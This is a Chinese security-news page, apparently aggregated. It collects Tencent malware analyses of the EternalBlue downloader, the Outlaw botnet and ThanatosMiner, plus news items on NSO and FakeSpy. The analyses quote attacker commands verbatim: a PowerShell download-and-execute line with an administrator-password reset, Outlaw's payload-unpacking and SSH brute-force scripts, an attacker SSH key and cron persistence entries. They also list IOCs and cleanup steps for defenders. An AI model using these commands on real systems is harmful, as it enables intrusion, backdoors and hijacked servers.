分类: 恶意软件

永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/YXnmVzAFVD5fc6lQIFWE1A   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马再次出现新变种,此次变种利用Python打包EXE可执行文件进行攻击,该组织曾在2018年底使用过类似手法。腾讯安全大数据监测数据显示,永恒之蓝下载器最新变种出现之后便迅速传播,目前已感染约1.5万台服务器,中毒系统最终用于下载运行门罗币挖矿木马。 永恒之蓝下载器木马在不断演进更新过程中,曾将EXE攻击方式逐步切换到利用Powershell脚本实现无文件攻击。在其功能越来越庞大之后,该黑产团伙再次将永恒之蓝漏洞攻击利用、mssql爆破攻击的代码重新添加到EXE木马中,并对Powershell中相关代码进行屏蔽。 被本次变种攻击失陷后的系统会下载if.bin、下载运行由随机字符串命名的EXE攻击模块进行大规模的漏洞扫描和攻击传播,同时会下载门罗币挖矿木马占用服务器大量CPU资源挖矿,会给受害企业造成严重生产力损失。 腾讯安全专家建议企业网管参考腾讯安全响应清单,对企业网络资产进行安全检测,以及时消除永恒之蓝下载器木马的破坏活动: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测; 2)已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯漏洞扫描服务(VSS)已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 附:永恒之蓝下载器木马历次版本更新情况如下: 时间 主要功能更新 2018年12月14日 利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 2018年12月19日 下载之后的木马新增Powershell后门安装。 2019年1月9日 检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 2019年1月24日 木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 2019年1月25日 木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 2019年2月10日 将攻击模块打包方式改为Pyinstaller。 2019年2月20日 更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 2019年2月23日 攻击方法再次更新,新增MsSQL爆破攻击。 2019年2月25日 在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 2019年3月6日 通过已感染机器后门更新Powershell脚本横向传播模块ipc。 2019年3月8日 通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 2019年3月14日 通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 2019年3月28日 更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 2019年4月3日 开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。 2019年7月19日 无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。 2019年10月9日 新增Bluekeep漏洞CVE-2019-0708检测上报功能。 2020年2月12日 使用DGA域名,篡改hosts文件。 2020年4月3日 新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 2020年4月17日 钓鱼邮件新增附件readme.zip、readme.doc,新增Bypass UAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘 2020年5月21日 新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。 2020年6月10日 新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 2020年6月24日 重新使用Python打包EXE攻击模块20.dat(C:\Windows\Temp\<random>.exe),负责永恒之蓝漏洞攻击、$IPC、SMB、mssql爆破攻击,其他攻击方式仍然通过Powershell实现。 二、样本分析 永恒之蓝下载器木马在Powershell攻击代码中,将扫描445端口进行攻击的$IPC爆破和永恒之蓝漏洞利用攻击功能进行了屏蔽。但以下功能仍然保留: 1.“永恒之蓝”漏洞利用MS17-010 2.Lnk漏洞利用CVE-2017-8464 3.Office漏洞利用CVE-2017-8570 4.RDP爆破 5.感染可移动盘、网络磁盘 6.钓鱼邮件(使用新冠病毒疫情相关主题) 7.SMBGhost漏洞利用CVE-2020-0796 8.SSH爆破攻击Linux系统 9.Redis未授权访问漏洞攻击Linux系统 然后在攻击后执行的Payload中添加一行代码,负责下载和执行EXE攻击模块 http[:]//d.ackng.com/ode.bin。 Ode.bin是经过加密的Powershell代码,解密后的内容主要完成以下功能: 生成4到8位字符组成的随机字符串作为文件名<random>.exe; 从http[:]//167.71.87.85/20.dat下载文件保存至C:\Windows\Temp\<random>.exe; 如果符合权限则创建计划任务”\Microsoft\Windows\<random>.exe “每50分钟执行一次20.dat,如果不符合权限则创建C:\Windows\Temp\\tt.vbs,通过VBS脚本代码创建计划任务“<random>.exe “,同样每50分钟执行一次20.dat。 通过计划任务执行的20.dat(拷贝至C:\Windows\Temp\<random>.exe md5: ef3a4697773f84850fe1a086db8edfe0)实际上是由Python代码打包的扫描攻击模块,与永恒之蓝下载器病毒2018年底第一次出现时的攻击模块C:\WINDOWS\Temp\svvhost.exe相似(参考https://www.freebuf.com/news/192015.html)。 该病毒在后来的逐步发展过程中,逐步将攻击代码转移到了Powershell实现,并且利用计划任务来动态获取和启动,不会在磁盘上留下文件,也就是“无文件攻击”模式攻击。而此次病毒重新启动exe攻击模块,可能是因为其功能不断扩展,需要将一部分代码进行分割,切割后的攻击模块及功能如下图所示。 If.bin中的Powershell攻击代码与上个版本相同,此处不再分析,分割出的xxx.exe中解码出Python实现的永恒之蓝漏洞攻击代码如下,另外还会执行$IPC、SMB、mssql弱口令爆破攻击: 攻击成功后执行shellcode 1、 下载和执行Powershell代码gim.jsp; 2、 修改administrator账户登陆密码为k8d3j9SjfS7并激活administrator账户; 3、 添加防火墙规则允许65529端口访问并开启监听。 cmd.exe /c netsh.exe firewall add portopening tcp 65529 DNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&powershell IEX(New-Object Net.WebClient).DownloadString(‘http[:]//t.amynx.com/gim.jsp’)&net user administrator k8d3j9SjfS7&net user administrator /active:yes gim.jsp是经过加密的Powershell代码,首先检测系统是否安装了以下杀软,如有调用卸载程序进行卸载: Eset、Kaspersky、avast、avp、Security、AntiVirus、Norton Security、Anti-Malware 然后安装一个计划任务“blackball”和一个随机名计划任务,定期下载和执行a.jsp(a.jsp继续下载和执行挖矿和攻击模块)。 IOCs Domain info.zz3r0.com info.amynx.com w.zz3r0.com IP 167.71.87.85 URL http[:]//167.71.87.85/20.dat http[:]//d.ackng.com/ode.bin http[:]//d.ackng.com/if.bin http[:]//t.amynx.com/gim.jsp http[:]//t.amynx.com/smgho.jsp http[:]//t.amynx.com/a.jsp md5 C:\Windows\Temp\<random>.exe ef3a4697773f84850fe1a086db8edfe0 8ec20f2cbad3103697a63d4444e5c062 ac48b1ea656b7f48c34e66d8e8d84537 d61d88b99c628179fa7cf9f2a310b4fb f944742b01606605a55c1d55c469f0c9 abd6f640423a9bf018853a2b40111f76 57812bde13f512f918a0096ad3e38a07 d8e643c74996bf3c88325067a8fc9d78 125a6199fd32fafec11f812358e814f2 fb880dc73e4db0a43be8a68ea443bfe1 8d46dbe92242a4fde2ea29cc277cca3f 48fbe4b6c9a8efc11f256bda33f03460 gim.jsp 98f48f31006be66a8e07b0ab189b6d02 a.jsp 6bb4e93d29e8b78e51565342b929c824 ode.bin e009720bd4ba5a83c4b0080eb3aea1fb if.bin 092478f1e16cbddb48afc3eecaf6be68 smgho.jsp ca717602f0700faba6d2fe014c9e6a8c 参考链接: 《“黑球”行动再升级,SMBGhost漏洞攻击进入实战》 https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA

以色列法院裁决 NSO 仍可继续出口间谍软件

据外媒报道,当地时间本周一,臭名昭著的间谍软件公司NSO集团在以色列法院上取得重大胜利,对此,批评者称这是一项不光彩的裁决。据了解,法院最终裁决NSO可以继续出口其黑客与监控工作,理由是人权组织Amnesty International未能证明NSO客户使用这些技术监视Amnesty员工。 据Motherboard当时报道,2018年,Amnesty宣称发现黑客使用NSO间谍软件监视其机构的一名研究人员。事件发生后,该组织在以色列起诉了NSO并试图阻止其监视技术出口。然而特拉维夫地区法院的一名法官以该公司未能出具足够的证据驳回了这一请求并还表示负责监督监视技术出口的以色列国防部拥有适当的保障措施来保护人权。 Amnesty严厉指责了这项裁决。Amnesty Tech代理联合总监Danna Ingleton表示:“今天这个可耻的裁决是对NSO集团将其产品卖给臭名昭著的人权侵犯者而使全世界处于危险中的人们的一残酷打击。在NSO和以色列国防部应该为他们的行为负责的时候,法院却没有这样做,这令人震惊。NSO集团将继续从侵犯人权行为中获利而不受惩罚。法院的裁决公然无视NSO集团的间谍软件被用来攻击从沙特阿拉伯到墨西哥的人权捍卫者的大量证据以及本案的基础–我们自己的Amnesty员工。我们将继续尽我们所能阻止NSO组织的间谍软件被用来侵犯人权。” 而NSO显然为这次胜利感到高兴。“这一判决是无可辩驳的证据,它证明了我们所处的监管框架是符合最高的国际标准的。结合NSO行业领先的治理框架,我们在正确使用技术和尊重人权方面上是全球领导者的这一事实得到了巩固。恐怖分子和犯罪分子的高级加密使得NSO向授权得到许可验的政府机构提供的这种合法和适当的响应成为必要。”   (稿源:cnBeta,封面源自网络。)

名为 FakeSpy 的 Android 恶意软件三年后“重现江湖” 比以前更危险

据外媒BGR报道,一款名为FakeSpy的Android恶意软件重现江湖,目前主要目标是美国和西欧的用户。该应用能够窃取用户的短信、银行信息和应用数据。该恶意软件通过一条看似来自当地邮局的短信进行传播,并指示用户下载一款伪装成合法邮局应用的应用。 据Cybereason的一份新报告显示,一款名为FakeSpy的危险Android恶意软件已重新出现。FakeSpy是近三年前被安全研究人员首次发现的,是一款特别恶劣的恶意软件,旨在窃取用户的短信、财务数据、银行登录信息、应用数据、联系人列表等。 在最初的化身中,该应用的目标是韩国和日本的用户。不过最近,这款应用的野心更大了,现在开始针对全球的用户。目前,该恶意软件针对的一些国家包括中国、法国、德国、英国和美国。据悉,目前FakeSpy的迭代也比原来的版本更加强大和复杂,也就是说安卓用户要特别警惕,避免收到可疑信息。 FakeSpy的传播方式相当巧妙,首先是一条声称来自当地邮局的短信。短信中声称邮局试图投递一个包裹,但由于用户不在家而无法投递。然后,它提供了一个用户可以点击的链接,该链接引导用户下载一个伪装成合法邮政服务应用的应用程序。一旦安装在设备上,该应用就会将假短信以及恶意链接发送到用户的整个联系人列表中。 Cybereason补充道: 虚假应用是使用WebView构建的,WebView是Android的View类的一个流行扩展,可以让开发者显示一个网页。FakeSpy利用这个视图,在启动应用时将用户重定向到原来的邮局运营商网页,继续欺骗。这使得应用程序看起来合法,特别是考虑到这些应用程序的图标和用户界面。 一旦不知情的用户下载了假应用,恶意软件基本上就可以完全访问用户的设备。其中,它可以读取短信,发送短信,访问联系人信息,并从外部存储中读取。除此之外,该应用还特意寻找任何银行或加密货币相关的应用,以便窃取登录信息。 至于恶意软件的来源,研究人员称,所有迹象都指向一个名为 “Roaming Mantis “的组织。 Cybereason总结道: 恶意软件的作者似乎花了很大力气来改进这个恶意软件, 捆绑了许多新的升级,使其更加复杂、容易规避、装备精良。这些改进使FakeSpy成为市场上最强大的信息窃取者之一。我们预计这种恶意软件将继续发展,增加更多的新功能;现在唯一的问题是,我们何时才能看到下一波。     (稿源:cnBeta,封面源自网络。)

亡命徒(Outlaw)僵尸网络感染约2万台Linux服务器,腾讯安全提醒企业及时清除

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/4_E6kPuodxb3_inVCq2fqg   一、背景 腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。亡命徒(Outlaw)僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸网络已造成国内约2万台Linux服务器感染,影响上万家企业。 此次攻击传播的母体文件为dota3.tar.gz,可能为亡命徒(Outlaw)僵尸网络的第3个版本,母体文件释放shell脚本启动对应二进制程序,kswapd0负责进行门罗币挖矿,tsm32、tsm64负责继续SSH爆破攻击传播病毒。 亡命徒(Outlaw)僵尸网络之前通过利用Shellshock漏洞进行分发,因此被命名为“ Shellbot”。Shellbot利用物联网(IoT)设备和Linux服务器上的常见命令注入漏洞进行感染。Shellshock漏洞(CVE-2014-7169)是2014年在Bash command shell中发现的一个严重的漏洞,大多数Linux发行版通常会使用到该功能,攻击者可以在这些受影响的Linux服务器上远程执行代码。 亡命徒(Outlaw)僵尸网络利用SSH爆破入侵的攻击活动,可以被腾讯T-Sec高级威胁检测系统(御界)检测到: 腾讯T-Sec云防火墙可以检测亡命徒(Outlaw)僵尸网络的挖矿行为、Shellshock漏洞利用及暴力破解SSH登录口令等等攻击活动。 目前,Outlaw僵尸网络的影响仍在扩散,对企业服务器危害严重,腾讯安全系列产品已采取应急响应措施,执行清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)亡命徒(Outlaw)僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)亡命徒(Outlaw)僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)亡命徒(Outlaw)僵尸网络相关联的IOCs已支持识别检测; 2)云防火墙已支持对亡命徒(Outlaw)僵尸网络所采用挖矿协议的检测拦截、Shellshock漏洞利用检测以及采取SSH暴力破解的检测。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持检测云主机是否存在SSH弱口令,检测外部针对云主机的SSH弱口令爆破行为; 2)已支持查杀亡命徒(Outlaw)僵尸网络相关的挖矿木马、后门程序。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯漏洞扫描服务已支持监测全网资产是否存在SSH弱口令。 2)腾讯漏洞扫描服务已支持检测全网资产是否受Shellshock漏洞CVE-2014-7169(UCS Manager相关)影响。   关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)御界已支持通过协议特征检测亡命徒(Outlaw)僵尸网络的挖矿行为; 2)御界已支持检测SSH弱口令爆破攻击行为; 3)腾讯御界已支持检测Shellshock漏洞CVE-2014-7169、CVE-2014-6271。 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀亡命徒(Outlaw)僵尸网络释放的后门木马、挖矿木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 Outlaw通过SSH爆破攻击,访问目标系统并下载带有shell脚本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到,根目录rsync下存放初始化脚本,a目录下存放shellbot后门,b目录下存放挖矿木马,c目录下存放SSH爆破攻击程序。 C目录下二进制文件tsm32、tsm64为SSH(22端口)扫描和爆破程序,并可以通过执行远程命名来下载和执行恶意程序。   爆破成功后执行base64编码的shell命令,主要功能为删除旧版本的恶意程序和目录,然后解压获取到的最新版本恶意程序并执行,内容如下: 命令1: #!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix rm -rf .X2* mkdir .X25-unix cd .X25-unix mv ar/tmp/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd .rsync; cat /tmp/.X25-unix/.rsync/initall | bash 2>1& sleep 45s && pkill -9 run && pkill -9 go && pkill -9 tsm exit 0 命令2: #!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix rm -rf .X2* mkdir .X25-unix cd .X25-unix mv ar/tmp/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd /tmp/.X25-unix/.rsync/c nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1& sleep 8m && nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1& sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1& exit 0 还会通过远程命令修改SSH公钥为: AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== 以便之后能更容易入侵。 B目录下run脚本主要内容为base64编码的shellbot后门程序,解码后可以看到代码仍然经过混淆。 把执行函数eval改为print可打印出解密后的代码,是基于Perl的Shellbot变种,连接C2服务器地址为45.9.148.99:443,能够执行多个后门命令,包括文件下载、执行shell cmd和DDoS攻击。如果接受到扫描端口命令,可针对以下端口进行扫描:”21″,”22″,”23″,”25″,”53″,”80″,”110″,”143″,”6665″。 A目录下二进制文件kswapd0为XMRig编译的Linux平台门罗币挖矿木马。 在初始化阶段会执行脚本init0来找到大量Linux平台竞品挖矿木马并进行清除。 在当前用户目录下创建/.configrc目录,拷贝a、b文件夹到该目录下并执行初始化脚本,然后通过写入cron.d安装计划任务进行持久化。写入定时任务如下: 1 1 */2 * * $dir2/a/upd>/dev/null 2>&1 @reboot $dir2/a/upd>/dev/null 2>&1 5 8 * * 0 $dir2/b/sync>/dev/null 2>&1 @reboot $dir2/b/sync>/dev/null 2>&1 0 0 */3 * * $dir/c/aptitude>/dev/null 2>&1 三、安全建议 建议企业Linux服务器管理员检查服务器资源占用情况,及时修改弱密码,避免被暴力破解。若发现服务器已被入侵安装挖矿木马,可参考以下步骤手动检查、清除: 1、 删除以下文件,杀死对应进程: /tmp/*-unix/.rsync/a/kswapd0 */.configrc/a/kswapd0 md5: 84945e9ea1950be3e870b798bd7c7559 /tmp/*-unix/.rsync/c/tsm64 md5: 4adb78770e06f8b257f77f555bf28065 /tmp/*-unix/.rsync/c/tsm32 md5: 10ea65f54f719bffcc0ae2cde450cb7a 2、 检查cron.d中是否存在包含以下内容的定时任务,如有进行删除: /a/upd /b/sync /c/aptitude IOCs IP 45.9.148.99 45.55.57.6 188.166.58.29 104.236.228.46 165.227.45.249 192.241.211.94 188.166.6.130 142.93.34.237 46.101.33.198 149.202.162.73 167.71.155.236 157.245.83.8 45.55.129.23 46.101.113.206 37.139.0.226 159.203.69.48 104.131.189.116 159.203.102.122 159.203.17.176 91.121.51.120 128.199.178.188 208.68.39.124 45.55.210.248 206.81.10.104 5.230.65.21 138.197.230.249 107.170.204.148 Md5 dota3.tar.gz 1a4592f48f8d1bf77895862e877181e0 kswapd0 84945e9ea1950be3e870b798bd7c7559 tsm64 4adb78770e06f8b257f77f555bf28065 tsm32 10ea65f54f719bffcc0ae2cde450cb7a run 716e6b533f836cee5e480a413a84645a URL http[:]//45.55.57.6/dota3.tar.gz http[:]//188.166.58.29/dota3.tar.gz http[:]//104.236.228.46/dota3.tar.gz http[:]//165.227.45.249/dota3.tar.gz http[:]//192.241.211.94/dota3.tar.gz http[:]//188.166.6.130/dota3.tar.gz http[:]//142.93.34.237/dota3.tar.gz http[:]//46.101.33.198/dota3.tar.gz http[:]//149.202.162.73/dota3.tar.gz http[:]//167.71.155.236/dota3.tar.gz http[:]//157.245.83.8/dota3.tar.gz http[:]//45.55.129.23/dota3.tar.gz http[:]//46.101.113.206/dota3.tar.gz http[:]//37.139.0.226/dota3.tar.gz http[:]//159.203.69.48/dota3.tar.gz http[:]//104.131.189.116/dota3.tar.gz http[:]//159.203.102.122/dota3.tar.gz http[:]//159.203.17.176/dota3.tar.gz http[:]//91.121.51.120/dota3.tar.gz http[:]//128.199.178.188/dota3.tar.gz http[:]//208.68.39.124/dota3.tar.gz http[:]//45.55.210.248/dota3.tar.gz http[:]//206.81.10.104/dota3.tar.gz http[:]//5.230.65.21/dota3.tar.gz http[:]//138.197.230.249/dota3.tar.gz http[:]//107.170.204.148/dota3.tar.gz  

ThanatosMiner 来了,捕获利用BlueKeep高危漏洞攻击传播的挖矿木马

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/oFnOODmShuuE5OUfbZKiEQ   一、背景 腾讯安全威胁情报中心检测到ThanatosMiner(死神矿工)挖矿木马利用BlueKeep漏洞CVE-2019-0708攻击传播。攻击者将公开的Python版本BlueKeep漏洞利用代码打包生成scan.exe,大范围扫描随机生成的IP地址进行探测和攻击。 漏洞利用成功后执行shellcode下载C#编写的木马svchost.exe,然后利用该木马下载门罗币挖矿木马以及攻击模块进行下一轮攻击。因Payload程序Assembly Name为ThanatosCrypt,将该挖矿木马命名为ThanatosMiner(死神矿工)。 2019年5月15日,微软发布了针对远程桌面服务(Remote Desktop Services )的关键远程执行代码漏洞CVE-2019-0708的安全更新,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作——意味着,存在漏洞的电脑只需要连网,勿须任何操作即可能遭遇远程黑客攻击而沦陷。BlueKeep漏洞(CVE-2019-0708)是所有安全厂商高度重视的高危漏洞。 该漏洞影响旧版本的Windows系统,包括: Windows 7、WindowsServer 2008 R2、Windows Server 2008、Windows 2003、Windows XP。Windows 8和Windows10及之后版本不受此漏洞影响。 腾讯安全系列产品已全面支持对ThanatosMiner(死神矿工)挖矿木马的查杀拦截,腾讯安全专家强烈建议用户及时修补BlueKeep漏洞,避免电脑被挖矿木马自动扫描攻击后完全控制。 二、样本分析 攻击模块scan.exe通过pyinstaller打包Python代码生成exe,使用pyinstxtractor.py可解压出Python编译后的无后缀文件scan。pyinstaller在打包pyc的时候会去掉pyc的magic和时间戳,而打包的系统库文件中这两项内容会被保留,所以可以查看解压出的系统库中的magic和时间戳并添加到scan的文件头,然后将其命名为scan.pyc,并通过uncompyle6进行反编译,可以还原的Python代码scan.py。 分析发现,Python3版本编译后的二进制文件开头为e3 00 00 00 00 00 00 00,Python2版本通常为63 00 00 00 00 00 00 00。 scan.py获取本机同网段IP地址,以及随机生成的外网IP地址扫描3389端口。 利用公开的BlueKeep漏洞CVE-2019-0708攻击代码进行攻击。 漏洞攻击成功执行shellcode命令,在%Temp%目录下创建DO.vbs,下载执行http[:]//download.loginserv.net/svchost.exe。 Payload木马svchost.exe采样C#编写,代码经过Dotfuscator混淆处理,可使用开源工具De4dot去除部分混淆,程序的Assembly Name为ThanatosCrypt。 运行后会检测以下注册表项和磁盘文件判断是否在虚拟机中运行。 SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers SOFTWARE\VMWare, Inc.\VMWare Tools SOFTWARE\Oracle\VirtualBox Guest Additions C:\windows\Sysnative\Drivers\Vmmouse.sys C:\windows\Sysnative\Drivers\vmci.sys C:\windows\Sysnative\Drivers\vmusbmouse.sys C:\windows\Sysnative\VBoxControl.exe 通过IsDebuggerPresent() 、IsDebuggerAttached()、CheckRemoteDebuggerPresent()判断进程是否被调试。 若无虚拟机环境、未处于被调试状态则继续执行。 然后svchost.exe继续下载http[:]//download.loginserv.net/scan.exe进行扫描攻击,以及下载http[:]//download.loginserv.net/xmrig.exe挖矿门罗币。 IOCs Domain download.loginserv.net MD5 URL http[:]//download.loginserv.net/svchost.exe http[:]//download.loginserv.net/xmrig.exe http[:]//download.loginserv.net/scan.exe http[:]//download.loginserv.net/mine.exe   参考链接 1.Windows远程桌面服务漏洞预警(CVE-2019-0708) https://mp.weixin.qq.com/s/aTSC0YR1dxSUHVJ3pnZezA 2.漏洞预警更新:Windows RDS漏洞(CVE-2019-0708) https://mp.weixin.qq.com/s/OEjI776O3cTjtMrsPdtnpQ 3.Windows远程桌面漏洞风险逼近,腾讯安全提供全面扫描修复方案 https://mp.weixin.qq.com/s/ckVHic2oChjZmVvH_zmsHA 4.Windows远程桌面服务漏洞(CVE-2019-0708)攻击代码现身 https://mp.weixin.qq.com/s/bcANAbzONFyrxqNMssTiLg 5.RDP漏洞(BlueKeep)野外利用预警,腾讯御知免费检测 https://mp.weixin.qq.com/s/G2ZS7rKkYYvEtbxUm0odGA 6.永恒之蓝下载器木马再升级,集成BlueKeep漏洞攻击能力 https://mp.weixin.qq.com/s/_teIut43g6In9YZ7VQ2f7w

WastedLocker:赛门铁克确定了针对美国组织的攻击浪潮

